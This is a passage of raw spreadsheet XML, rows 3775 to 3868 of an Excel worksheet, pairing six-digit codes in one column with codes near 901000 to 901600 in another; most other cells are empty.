    <row r="3775" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3775" s="5">
        <v>700409</v>
      </c>
      <c r="B3775" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3775" s="5"/>
      <c r="E3775" s="3"/>
      <c r="F3775" s="1"/>
      <c r="H3775" s="1"/>
    </row>
    <row r="3776" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3776" s="5">
        <v>700409</v>
      </c>
      <c r="B3776" s="3">
        <v>901217</v>
      </c>
      <c r="D3776" s="5"/>
      <c r="E3776" s="3"/>
      <c r="F3776" s="1"/>
      <c r="H3776" s="1"/>
    </row>
    <row r="3777" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3777" s="5">
        <v>700409</v>
      </c>
      <c r="B3777" s="3">
        <v>901115</v>
      </c>
      <c r="D3777" s="5"/>
      <c r="E3777" s="3"/>
      <c r="F3777" s="1"/>
      <c r="H3777" s="1"/>
    </row>
    <row r="3778" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3778" s="5">
        <v>700409</v>
      </c>
      <c r="B3778" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D3778" s="5"/>
      <c r="E3778" s="3"/>
      <c r="F3778" s="1"/>
      <c r="H3778" s="1"/>
    </row>
    <row r="3779" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3779" s="5">
        <v>700409</v>
      </c>
      <c r="B3779" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D3779" s="5"/>
      <c r="E3779" s="3"/>
      <c r="F3779" s="1"/>
      <c r="H3779" s="1"/>
    </row>
    <row r="3780" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3780" s="5">
        <v>700409</v>
      </c>
      <c r="B3780" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D3780" s="5"/>
      <c r="E3780" s="3"/>
      <c r="F3780" s="1"/>
      <c r="H3780" s="1"/>
    </row>
    <row r="3781" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3781" s="5">
        <v>700409</v>
      </c>
      <c r="B3781" s="3">
        <v>901005</v>
      </c>
      <c r="D3781" s="5"/>
      <c r="E3781" s="3"/>
      <c r="F3781" s="1"/>
      <c r="H3781" s="1"/>
    </row>
    <row r="3782" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3782" s="5">
        <v>700409</v>
      </c>
      <c r="B3782" s="3">
        <v>901025</v>
      </c>
      <c r="D3782" s="5"/>
      <c r="E3782" s="3"/>
      <c r="F3782" s="1"/>
      <c r="H3782" s="1"/>
    </row>
    <row r="3783" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3783" s="5">
        <v>700409</v>
      </c>
      <c r="B3783" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D3783" s="5"/>
      <c r="E3783" s="3"/>
      <c r="F3783" s="1"/>
      <c r="H3783" s="1"/>
    </row>
    <row r="3784" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3784" s="5">
        <v>700409</v>
      </c>
      <c r="B3784" s="3">
        <v>901140</v>
      </c>
      <c r="D3784" s="5"/>
      <c r="E3784" s="3"/>
      <c r="F3784" s="1"/>
      <c r="H3784" s="1"/>
    </row>
    <row r="3785" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3785" s="5">
        <v>700409</v>
      </c>
      <c r="B3785" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D3785" s="5"/>
      <c r="E3785" s="3"/>
      <c r="F3785" s="1"/>
      <c r="H3785" s="1"/>
    </row>
    <row r="3786" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3786" s="5">
        <v>700409</v>
      </c>
      <c r="B3786" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D3786" s="5"/>
      <c r="E3786" s="3"/>
      <c r="F3786" s="1"/>
      <c r="H3786" s="1"/>
    </row>
    <row r="3787" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3787" s="5">
        <v>700409</v>
      </c>
      <c r="B3787" s="3">
        <v>901041</v>
      </c>
      <c r="D3787" s="5"/>
      <c r="E3787" s="3"/>
      <c r="F3787" s="1"/>
      <c r="H3787" s="1"/>
    </row>
    <row r="3788" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3788" s="5">
        <v>700409</v>
      </c>
      <c r="B3788" s="3">
        <v>901052.00100000005</v>
      </c>
      <c r="D3788" s="5"/>
      <c r="E3788" s="3"/>
      <c r="F3788" s="1"/>
      <c r="H3788" s="1"/>
    </row>
    <row r="3789" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3789" s="5">
        <v>700409</v>
      </c>
      <c r="B3789" s="3">
        <v>901008</v>
      </c>
      <c r="D3789" s="5"/>
      <c r="E3789" s="3"/>
      <c r="F3789" s="1"/>
      <c r="H3789" s="1"/>
    </row>
    <row r="3790" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3790" s="5">
        <v>700409</v>
      </c>
      <c r="B3790" s="3">
        <v>901083</v>
      </c>
      <c r="D3790" s="5"/>
      <c r="E3790" s="3"/>
      <c r="F3790" s="1"/>
      <c r="H3790" s="1"/>
    </row>
    <row r="3791" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3791" s="5">
        <v>700409</v>
      </c>
      <c r="B3791" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D3791" s="5"/>
      <c r="E3791" s="3"/>
      <c r="F3791" s="1"/>
      <c r="H3791" s="1"/>
    </row>
    <row r="3792" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3792" s="5">
        <v>700409</v>
      </c>
      <c r="B3792" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3792" s="5"/>
      <c r="E3792" s="3"/>
      <c r="F3792" s="1"/>
      <c r="H3792" s="1"/>
    </row>
    <row r="3793" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3793" s="5">
        <v>700409</v>
      </c>
      <c r="B3793" s="3">
        <v>901105</v>
      </c>
      <c r="D3793" s="5"/>
      <c r="E3793" s="3"/>
      <c r="F3793" s="1"/>
      <c r="H3793" s="1"/>
    </row>
    <row r="3794" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3794" s="5">
        <v>700409</v>
      </c>
      <c r="B3794" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3794" s="5"/>
      <c r="E3794" s="3"/>
      <c r="F3794" s="1"/>
      <c r="H3794" s="1"/>
    </row>
    <row r="3795" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3795" s="5">
        <v>700409</v>
      </c>
      <c r="B3795" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D3795" s="5"/>
      <c r="E3795" s="3"/>
      <c r="F3795" s="1"/>
      <c r="H3795" s="1"/>
    </row>
    <row r="3796" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3796" s="5">
        <v>700409</v>
      </c>
      <c r="B3796" s="3">
        <v>901036.005</v>
      </c>
      <c r="D3796" s="5"/>
      <c r="E3796" s="3"/>
      <c r="F3796" s="1"/>
      <c r="H3796" s="1"/>
    </row>
    <row r="3797" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3797" s="5">
        <v>700409</v>
      </c>
      <c r="B3797" s="3">
        <v>901027</v>
      </c>
      <c r="D3797" s="5"/>
      <c r="E3797" s="3"/>
      <c r="F3797" s="1"/>
      <c r="H3797" s="1"/>
    </row>
    <row r="3798" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3798" s="5">
        <v>700409</v>
      </c>
      <c r="B3798" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D3798" s="5"/>
      <c r="E3798" s="3"/>
      <c r="F3798" s="1"/>
      <c r="H3798" s="1"/>
    </row>
    <row r="3799" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3799" s="5">
        <v>700409</v>
      </c>
      <c r="B3799" s="3">
        <v>901120</v>
      </c>
      <c r="D3799" s="5"/>
      <c r="E3799" s="3"/>
      <c r="F3799" s="1"/>
      <c r="H3799" s="1"/>
    </row>
    <row r="3800" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3800" s="5">
        <v>700409</v>
      </c>
      <c r="B3800" s="3">
        <v>901057</v>
      </c>
      <c r="D3800" s="5"/>
      <c r="E3800" s="3"/>
      <c r="F3800" s="1"/>
      <c r="H3800" s="1"/>
    </row>
    <row r="3801" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3801" s="5">
        <v>700409</v>
      </c>
      <c r="B3801" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3801" s="5"/>
      <c r="E3801" s="3"/>
      <c r="F3801" s="1"/>
      <c r="H3801" s="1"/>
    </row>
    <row r="3802" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3802" s="5">
        <v>700409</v>
      </c>
      <c r="B3802" s="3">
        <v>901029</v>
      </c>
      <c r="D3802" s="5"/>
      <c r="E3802" s="3"/>
      <c r="F3802" s="1"/>
      <c r="H3802" s="1"/>
    </row>
    <row r="3803" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3803" s="5">
        <v>700409</v>
      </c>
      <c r="B3803" s="3">
        <v>901113</v>
      </c>
      <c r="D3803" s="5"/>
      <c r="E3803" s="3"/>
      <c r="F3803" s="1"/>
      <c r="H3803" s="1"/>
    </row>
    <row r="3804" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3804" s="5">
        <v>700409</v>
      </c>
      <c r="B3804" s="3">
        <v>901082</v>
      </c>
      <c r="D3804" s="5"/>
      <c r="E3804" s="3"/>
      <c r="F3804" s="1"/>
      <c r="H3804" s="1"/>
    </row>
    <row r="3805" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3805" s="5">
        <v>700409</v>
      </c>
      <c r="B3805" s="3">
        <v>901016</v>
      </c>
      <c r="D3805" s="5"/>
      <c r="E3805" s="3"/>
      <c r="F3805" s="1"/>
      <c r="H3805" s="1"/>
    </row>
    <row r="3806" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3806" s="5">
        <v>700409</v>
      </c>
      <c r="B3806" s="3">
        <v>901049</v>
      </c>
      <c r="D3806" s="5"/>
      <c r="E3806" s="3"/>
      <c r="F3806" s="1"/>
      <c r="H3806" s="1"/>
    </row>
    <row r="3807" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3807" s="5">
        <v>700409</v>
      </c>
      <c r="B3807" s="3">
        <v>901552.00399999996</v>
      </c>
      <c r="D3807" s="5"/>
      <c r="E3807" s="3"/>
      <c r="F3807" s="1"/>
      <c r="H3807" s="1"/>
    </row>
    <row r="3808" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3808" s="5">
        <v>700409</v>
      </c>
      <c r="B3808" s="3">
        <v>901125</v>
      </c>
      <c r="D3808" s="5"/>
      <c r="E3808" s="3"/>
      <c r="F3808" s="1"/>
      <c r="H3808" s="1"/>
    </row>
    <row r="3809" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3809" s="5">
        <v>700282</v>
      </c>
      <c r="B3809" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3809" s="5"/>
      <c r="E3809" s="3"/>
      <c r="F3809" s="1"/>
      <c r="H3809" s="1"/>
    </row>
    <row r="3810" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3810" s="5">
        <v>700282</v>
      </c>
      <c r="B3810" s="3">
        <v>901123</v>
      </c>
      <c r="D3810" s="5"/>
      <c r="E3810" s="3"/>
      <c r="F3810" s="1"/>
      <c r="H3810" s="1"/>
    </row>
    <row r="3811" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3811" s="5">
        <v>700282</v>
      </c>
      <c r="B3811" s="3">
        <v>901115</v>
      </c>
      <c r="D3811" s="5"/>
      <c r="E3811" s="3"/>
      <c r="F3811" s="1"/>
      <c r="H3811" s="1"/>
    </row>
    <row r="3812" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3812" s="5">
        <v>700282</v>
      </c>
      <c r="B3812" s="3">
        <v>901543.00100000005</v>
      </c>
      <c r="D3812" s="5"/>
      <c r="E3812" s="3"/>
      <c r="F3812" s="1"/>
      <c r="H3812" s="1"/>
    </row>
    <row r="3813" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3813" s="5">
        <v>700282</v>
      </c>
      <c r="B3813" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D3813" s="5"/>
      <c r="E3813" s="3"/>
      <c r="F3813" s="1"/>
      <c r="H3813" s="1"/>
    </row>
    <row r="3814" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3814" s="5">
        <v>700282</v>
      </c>
      <c r="B3814" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3814" s="5"/>
      <c r="E3814" s="3"/>
      <c r="F3814" s="1"/>
      <c r="H3814" s="1"/>
    </row>
    <row r="3815" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3815" s="5">
        <v>700282</v>
      </c>
      <c r="B3815" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3815" s="5"/>
      <c r="E3815" s="3"/>
      <c r="F3815" s="1"/>
      <c r="H3815" s="1"/>
    </row>
    <row r="3816" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3816" s="5">
        <v>700282</v>
      </c>
      <c r="B3816" s="3">
        <v>901090.00300000003</v>
      </c>
      <c r="D3816" s="5"/>
      <c r="E3816" s="3"/>
      <c r="F3816" s="1"/>
      <c r="H3816" s="1"/>
    </row>
    <row r="3817" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3817" s="5">
        <v>700282</v>
      </c>
      <c r="B3817" s="3">
        <v>901113</v>
      </c>
      <c r="D3817" s="5"/>
      <c r="E3817" s="3"/>
      <c r="F3817" s="1"/>
      <c r="H3817" s="1"/>
    </row>
    <row r="3818" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3818" s="5">
        <v>700413</v>
      </c>
      <c r="B3818" s="3">
        <v>901087.00300000003</v>
      </c>
      <c r="D3818" s="5"/>
      <c r="E3818" s="3"/>
      <c r="F3818" s="1"/>
      <c r="H3818" s="1"/>
    </row>
    <row r="3819" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3819" s="5">
        <v>700413</v>
      </c>
      <c r="B3819" s="3">
        <v>901110.00300000003</v>
      </c>
      <c r="D3819" s="5"/>
      <c r="E3819" s="3"/>
      <c r="F3819" s="1"/>
      <c r="H3819" s="1"/>
    </row>
    <row r="3820" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3820" s="5">
        <v>700413</v>
      </c>
      <c r="B3820" s="3">
        <v>901114.00199999998</v>
      </c>
      <c r="D3820" s="5"/>
      <c r="E3820" s="3"/>
      <c r="F3820" s="1"/>
      <c r="H3820" s="1"/>
    </row>
    <row r="3821" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3821" s="5">
        <v>700485</v>
      </c>
      <c r="B3821" s="5">
        <v>901432</v>
      </c>
      <c r="D3821" s="5"/>
      <c r="E3821" s="5"/>
      <c r="F3821" s="1"/>
      <c r="H3821" s="1"/>
    </row>
    <row r="3822" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3822" s="5">
        <v>700485</v>
      </c>
      <c r="B3822" s="3">
        <v>901517</v>
      </c>
      <c r="D3822" s="5"/>
      <c r="E3822" s="3"/>
      <c r="F3822" s="1"/>
      <c r="H3822" s="1"/>
    </row>
    <row r="3823" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3823" s="5">
        <v>700485</v>
      </c>
      <c r="B3823" s="3">
        <v>901409</v>
      </c>
      <c r="D3823" s="5"/>
      <c r="E3823" s="3"/>
      <c r="F3823" s="1"/>
      <c r="H3823" s="1"/>
    </row>
    <row r="3824" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3824" s="5">
        <v>700485</v>
      </c>
      <c r="B3824" s="3">
        <v>901418</v>
      </c>
      <c r="D3824" s="5"/>
      <c r="E3824" s="3"/>
      <c r="F3824" s="1"/>
      <c r="H3824" s="1"/>
    </row>
    <row r="3825" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3825" s="5">
        <v>700485</v>
      </c>
      <c r="B3825" s="3">
        <v>901412</v>
      </c>
      <c r="D3825" s="5"/>
      <c r="E3825" s="3"/>
      <c r="F3825" s="1"/>
      <c r="H3825" s="1"/>
    </row>
    <row r="3826" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3826" s="5">
        <v>700485</v>
      </c>
      <c r="B3826" s="3">
        <v>901436</v>
      </c>
      <c r="D3826" s="5"/>
      <c r="E3826" s="3"/>
      <c r="F3826" s="1"/>
      <c r="H3826" s="1"/>
    </row>
    <row r="3827" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3827" s="5">
        <v>700485</v>
      </c>
      <c r="B3827" s="3">
        <v>901447</v>
      </c>
      <c r="D3827" s="5"/>
      <c r="E3827" s="3"/>
      <c r="F3827" s="1"/>
      <c r="H3827" s="1"/>
    </row>
    <row r="3828" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3828" s="5">
        <v>700485</v>
      </c>
      <c r="B3828" s="3">
        <v>901475</v>
      </c>
      <c r="D3828" s="5"/>
      <c r="E3828" s="3"/>
      <c r="F3828" s="1"/>
      <c r="H3828" s="1"/>
    </row>
    <row r="3829" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3829" s="5">
        <v>700485</v>
      </c>
      <c r="B3829" s="3">
        <v>901401</v>
      </c>
      <c r="D3829" s="5"/>
      <c r="E3829" s="3"/>
      <c r="F3829" s="1"/>
      <c r="H3829" s="1"/>
    </row>
    <row r="3830" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3830" s="5">
        <v>700485</v>
      </c>
      <c r="B3830" s="3">
        <v>901520</v>
      </c>
      <c r="D3830" s="5"/>
      <c r="E3830" s="3"/>
      <c r="F3830" s="1"/>
      <c r="H3830" s="1"/>
    </row>
    <row r="3831" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3831" s="5">
        <v>700485</v>
      </c>
      <c r="B3831" s="3">
        <v>901407</v>
      </c>
      <c r="D3831" s="5"/>
      <c r="E3831" s="3"/>
      <c r="F3831" s="1"/>
      <c r="H3831" s="1"/>
    </row>
    <row r="3832" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3832" s="5">
        <v>700485</v>
      </c>
      <c r="B3832" s="3">
        <v>901523</v>
      </c>
      <c r="D3832" s="5"/>
      <c r="E3832" s="3"/>
      <c r="F3832" s="1"/>
      <c r="H3832" s="1"/>
    </row>
    <row r="3833" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3833" s="5">
        <v>700485</v>
      </c>
      <c r="B3833" s="3">
        <v>901541</v>
      </c>
      <c r="D3833" s="5"/>
      <c r="E3833" s="3"/>
      <c r="F3833" s="1"/>
      <c r="H3833" s="1"/>
    </row>
    <row r="3834" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3834" s="5">
        <v>700485</v>
      </c>
      <c r="B3834" s="3">
        <v>901516</v>
      </c>
      <c r="D3834" s="5"/>
      <c r="E3834" s="3"/>
      <c r="F3834" s="1"/>
      <c r="H3834" s="1"/>
    </row>
    <row r="3835" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3835" s="5">
        <v>700485</v>
      </c>
      <c r="B3835" s="3">
        <v>901411</v>
      </c>
      <c r="D3835" s="5"/>
      <c r="E3835" s="3"/>
      <c r="F3835" s="1"/>
      <c r="H3835" s="1"/>
    </row>
    <row r="3836" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3836" s="5">
        <v>700485</v>
      </c>
      <c r="B3836" s="3">
        <v>901478</v>
      </c>
      <c r="D3836" s="5"/>
      <c r="E3836" s="3"/>
      <c r="F3836" s="1"/>
      <c r="H3836" s="1"/>
    </row>
    <row r="3837" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3837" s="5">
        <v>700485</v>
      </c>
      <c r="B3837" s="3">
        <v>901430</v>
      </c>
      <c r="D3837" s="5"/>
      <c r="E3837" s="3"/>
      <c r="F3837" s="1"/>
      <c r="H3837" s="1"/>
    </row>
    <row r="3838" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3838" s="5">
        <v>700485</v>
      </c>
      <c r="B3838" s="3">
        <v>901444</v>
      </c>
      <c r="D3838" s="5"/>
      <c r="E3838" s="3"/>
      <c r="F3838" s="1"/>
      <c r="H3838" s="1"/>
    </row>
    <row r="3839" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3839" s="5">
        <v>700485</v>
      </c>
      <c r="B3839" s="3">
        <v>901406</v>
      </c>
      <c r="D3839" s="5"/>
      <c r="E3839" s="3"/>
      <c r="F3839" s="1"/>
      <c r="H3839" s="1"/>
    </row>
    <row r="3840" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3840" s="5">
        <v>700485</v>
      </c>
      <c r="B3840" s="3">
        <v>901544</v>
      </c>
      <c r="D3840" s="5"/>
      <c r="E3840" s="3"/>
      <c r="F3840" s="1"/>
      <c r="H3840" s="1"/>
    </row>
    <row r="3841" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3841" s="5">
        <v>700485</v>
      </c>
      <c r="B3841" s="3">
        <v>901513</v>
      </c>
      <c r="D3841" s="5"/>
      <c r="E3841" s="3"/>
      <c r="F3841" s="1"/>
      <c r="H3841" s="1"/>
    </row>
    <row r="3842" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3842" s="5">
        <v>700485</v>
      </c>
      <c r="B3842" s="3">
        <v>901582</v>
      </c>
      <c r="D3842" s="5"/>
      <c r="E3842" s="3"/>
      <c r="F3842" s="1"/>
      <c r="H3842" s="1"/>
    </row>
    <row r="3843" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3843" s="5">
        <v>700485</v>
      </c>
      <c r="B3843" s="3">
        <v>901508</v>
      </c>
      <c r="D3843" s="5"/>
      <c r="E3843" s="3"/>
      <c r="F3843" s="1"/>
      <c r="H3843" s="1"/>
    </row>
    <row r="3844" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3844" s="5">
        <v>700485</v>
      </c>
      <c r="B3844" s="3">
        <v>901426</v>
      </c>
      <c r="D3844" s="5"/>
      <c r="E3844" s="3"/>
      <c r="F3844" s="1"/>
      <c r="H3844" s="1"/>
    </row>
    <row r="3845" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3845" s="5">
        <v>700485</v>
      </c>
      <c r="B3845" s="3">
        <v>901509</v>
      </c>
      <c r="D3845" s="5"/>
      <c r="E3845" s="3"/>
      <c r="F3845" s="1"/>
      <c r="H3845" s="1"/>
    </row>
    <row r="3846" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3846" s="5">
        <v>700485</v>
      </c>
      <c r="B3846" s="3">
        <v>901481</v>
      </c>
      <c r="D3846" s="5"/>
      <c r="E3846" s="3"/>
      <c r="F3846" s="1"/>
      <c r="H3846" s="1"/>
    </row>
    <row r="3847" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3847" s="5">
        <v>700317</v>
      </c>
      <c r="B3847" s="3">
        <v>901476</v>
      </c>
      <c r="D3847" s="5"/>
      <c r="E3847" s="3"/>
      <c r="F3847" s="1"/>
      <c r="H3847" s="1"/>
    </row>
    <row r="3848" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3848" s="5">
        <v>700317</v>
      </c>
      <c r="B3848" s="3">
        <v>901401</v>
      </c>
      <c r="D3848" s="5"/>
      <c r="E3848" s="3"/>
      <c r="F3848" s="1"/>
      <c r="H3848" s="1"/>
    </row>
    <row r="3849" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3849" s="5">
        <v>700317</v>
      </c>
      <c r="B3849" s="3">
        <v>901411</v>
      </c>
      <c r="D3849" s="5"/>
      <c r="E3849" s="3"/>
      <c r="F3849" s="1"/>
      <c r="H3849" s="1"/>
    </row>
    <row r="3850" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3850" s="5">
        <v>700652</v>
      </c>
      <c r="B3850" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3850" s="5"/>
      <c r="E3850" s="3"/>
      <c r="F3850" s="1"/>
      <c r="H3850" s="1"/>
    </row>
    <row r="3851" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3851" s="5">
        <v>700652</v>
      </c>
      <c r="B3851" s="3">
        <v>901197</v>
      </c>
      <c r="D3851" s="5"/>
      <c r="E3851" s="3"/>
      <c r="F3851" s="1"/>
      <c r="H3851" s="1"/>
    </row>
    <row r="3852" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3852" s="5">
        <v>700652</v>
      </c>
      <c r="B3852" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3852" s="5"/>
      <c r="E3852" s="3"/>
      <c r="F3852" s="1"/>
      <c r="H3852" s="1"/>
    </row>
    <row r="3853" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3853" s="5">
        <v>700652</v>
      </c>
      <c r="B3853" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D3853" s="5"/>
      <c r="E3853" s="3"/>
      <c r="F3853" s="1"/>
      <c r="H3853" s="1"/>
    </row>
    <row r="3854" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3854" s="5">
        <v>700652</v>
      </c>
      <c r="B3854" s="3">
        <v>901115</v>
      </c>
      <c r="D3854" s="5"/>
      <c r="E3854" s="3"/>
      <c r="F3854" s="1"/>
      <c r="H3854" s="1"/>
    </row>
    <row r="3855" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3855" s="5">
        <v>700652</v>
      </c>
      <c r="B3855" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3855" s="5"/>
      <c r="E3855" s="3"/>
      <c r="F3855" s="1"/>
      <c r="H3855" s="1"/>
    </row>
    <row r="3856" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3856" s="5">
        <v>700652</v>
      </c>
      <c r="B3856" s="3">
        <v>901555.005</v>
      </c>
      <c r="D3856" s="5"/>
      <c r="E3856" s="3"/>
      <c r="F3856" s="1"/>
      <c r="H3856" s="1"/>
    </row>
    <row r="3857" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3857" s="5">
        <v>700652</v>
      </c>
      <c r="B3857" s="3">
        <v>901005</v>
      </c>
      <c r="D3857" s="5"/>
      <c r="E3857" s="3"/>
      <c r="F3857" s="1"/>
      <c r="H3857" s="1"/>
    </row>
    <row r="3858" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3858" s="5">
        <v>700652</v>
      </c>
      <c r="B3858" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D3858" s="5"/>
      <c r="E3858" s="3"/>
      <c r="F3858" s="1"/>
      <c r="H3858" s="1"/>
    </row>
    <row r="3859" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3859" s="5">
        <v>700652</v>
      </c>
      <c r="B3859" s="3">
        <v>901041</v>
      </c>
      <c r="D3859" s="5"/>
      <c r="E3859" s="3"/>
      <c r="F3859" s="1"/>
      <c r="H3859" s="1"/>
    </row>
    <row r="3860" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3860" s="5">
        <v>700652</v>
      </c>
      <c r="B3860" s="3">
        <v>901083</v>
      </c>
      <c r="D3860" s="5"/>
      <c r="E3860" s="3"/>
      <c r="F3860" s="1"/>
      <c r="H3860" s="1"/>
    </row>
    <row r="3861" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3861" s="5">
        <v>700652</v>
      </c>
      <c r="B3861" s="3">
        <v>901105</v>
      </c>
      <c r="D3861" s="5"/>
      <c r="E3861" s="3"/>
      <c r="F3861" s="1"/>
      <c r="H3861" s="1"/>
    </row>
    <row r="3862" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3862" s="5">
        <v>700652</v>
      </c>
      <c r="B3862" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3862" s="5"/>
      <c r="E3862" s="3"/>
      <c r="F3862" s="1"/>
      <c r="H3862" s="1"/>
    </row>
    <row r="3863" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3863" s="5">
        <v>700652</v>
      </c>
      <c r="B3863" s="3">
        <v>901036.005</v>
      </c>
      <c r="D3863" s="5"/>
      <c r="E3863" s="3"/>
      <c r="F3863" s="1"/>
      <c r="H3863" s="1"/>
    </row>
    <row r="3864" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3864" s="5">
        <v>700652</v>
      </c>
      <c r="B3864" s="3">
        <v>901106</v>
      </c>
      <c r="D3864" s="5"/>
      <c r="E3864" s="3"/>
      <c r="F3864" s="1"/>
      <c r="H3864" s="1"/>
    </row>
    <row r="3865" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3865" s="5">
        <v>700652</v>
      </c>
      <c r="B3865" s="3">
        <v>901057</v>
      </c>
      <c r="D3865" s="5"/>
      <c r="E3865" s="3"/>
      <c r="F3865" s="1"/>
      <c r="H3865" s="1"/>
    </row>
    <row r="3866" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3866" s="5">
        <v>700652</v>
      </c>
      <c r="B3866" s="3">
        <v>901113</v>
      </c>
      <c r="D3866" s="5"/>
      <c r="E3866" s="3"/>
      <c r="F3866" s="1"/>
      <c r="H3866" s="1"/>
    </row>
    <row r="3867" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3867" s="5">
        <v>700652</v>
      </c>
      <c r="B3867" s="3">
        <v>901518</v>
      </c>
      <c r="D3867" s="5"/>
      <c r="E3867" s="3"/>
      <c r="F3867" s="1"/>
      <c r="H3867" s="1"/>
    </row>
    <row r="3868" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3868" s="5">
        <v>700652</v>
      </c>
      <c r="B3868" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D3868" s="5"/>
      <c r="E3868" s="3"/>
      <c r="F3868" s="1"/>
